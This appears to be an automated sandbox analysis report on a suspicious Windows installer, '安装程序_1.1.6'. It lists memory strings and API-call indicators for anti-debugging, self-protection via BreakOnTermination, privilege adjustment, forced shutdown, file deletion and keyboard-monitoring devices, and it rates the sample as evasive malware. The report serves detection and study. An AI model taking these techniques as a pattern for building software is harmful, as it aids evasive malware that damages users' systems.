Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
PE file contains section with special chars
Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAB3886
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC38810 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6CC38810
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC39450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC39450
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAB3C62
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAB3D18
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAB3D62
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAB39CF
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAB3A6A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB1950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6CAB1950
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6CAB4754
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB47546_2_6CAB4754
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CE18D126_2_6CE18D12
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CD84F0A6_2_6CD84F0A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CDA38816_2_6CDA3881
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CE0B06F6_2_6CE0B06F
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC348606_2_6CC34860
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC3A1336_2_6CC3A133
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CD47A466_2_6CD47A46
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CDBCB306_2_6CDBCB30
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC99CE06_2_6CC99CE0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCE6D506_2_6CCE6D50
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC85EC96_2_6CC85EC9
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCECE806_2_6CCECE80
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC6BEA16_2_6CC6BEA1
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCE18106_2_6CCE1810
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCEC9F06_2_6CCEC9F0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC6B9726_2_6CC6B972
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCFD9306_2_6CCFD930
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCE0AD06_2_6CCE0AD0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCE4AA06_2_6CCE4AA0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCF7AA06_2_6CCF7AA0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCE2A506_2_6CCE2A50
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC73BCA6_2_6CC73BCA
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC83B666_2_6CC83B66
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC8840A6_2_6CC8840A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCF25C06_2_6CCF25C0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCE55806_2_6CCE5580
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCEC6E06_2_6CCEC6E0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC6F7CF6_2_6CC6F7CF
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CD0C7006_2_6CD0C700
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCE30206_2_6CCE3020
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CCF67506_2_6CCF6750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007181EC10_2_007181EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006EE00A10_2_006EE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007581C010_2_007581C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076824010_2_00768240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007522E010_2_007522E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0077230010_2_00772300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076C3C010_2_0076C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007604C810_2_007604C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0073E49F10_2_0073E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007525F010_2_007525F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074865010_2_00748650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007466D010_2_007466D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074A6A010_2_0074A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074C95010_2_0074C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0072094310_2_00720943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076E99010_2_0076E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00752A8010_2_00752A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0072AB1110_2_0072AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00748C2010_2_00748C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00756CE010_2_00756CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00760E0010_2_00760E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00764EA010_2_00764EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007310AC10_2_007310AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0075D08910_2_0075D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0073B12110_2_0073B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076112010_2_00761120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074D1D010_2_0074D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007691C010_2_007691C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0075518010_2_00755180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074B18010_2_0074B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076720010_2_00767200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076D2C010_2_0076D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007353F310_2_007353F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006FB3E410_2_006FB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D53CF10_2_006D53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076F3C010_2_0076F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0075F3A010_2_0075F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076D47010_2_0076D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0075F42010_2_0075F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074741010_2_00747410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007654D010_2_007654D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0071D49610_2_0071D496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D157210_2_006D1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076155010_2_00761550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076353010_2_00763530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0077351A10_2_0077351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074F50010_2_0074F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076F59910_2_0076F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0072965210_2_00729652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0077360110_2_00773601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0075D6A010_2_0075D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006E976610_2_006E9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D97CA10_2_006D97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007677C010_2_007677C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006FF8E010_2_006FF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074F91010_2_0074F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076D9E010_2_0076D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00757AF010_2_00757AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00723AEF10_2_00723AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006EBAC910_2_006EBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D1AA110_2_006D1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00757C5010_2_00757C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006EBC9210_2_006EBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0074FDF010_2_0074FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00755E8010_2_00755E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00755F8010_2_00755F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: String function: 6CD09F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: String function: 6CC6C240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 006D1E40 appears 84 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 006D28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0076FB10 appears 720 times
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002FFE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F38A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000000.1710884007.0000000000AC9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeBinary or memory string: OriginalFileNameWYrCKz9k4wnV.exe vs #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal96.evad.winEXE@131/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC39450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC39450
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_006D9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006E3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_006E3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_006D9252
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC38930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,6_2_6CC38930
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Program Files (x86)\Windows NT\is-H97U1.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4048:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3704:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3448:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4820:120:WilError_03
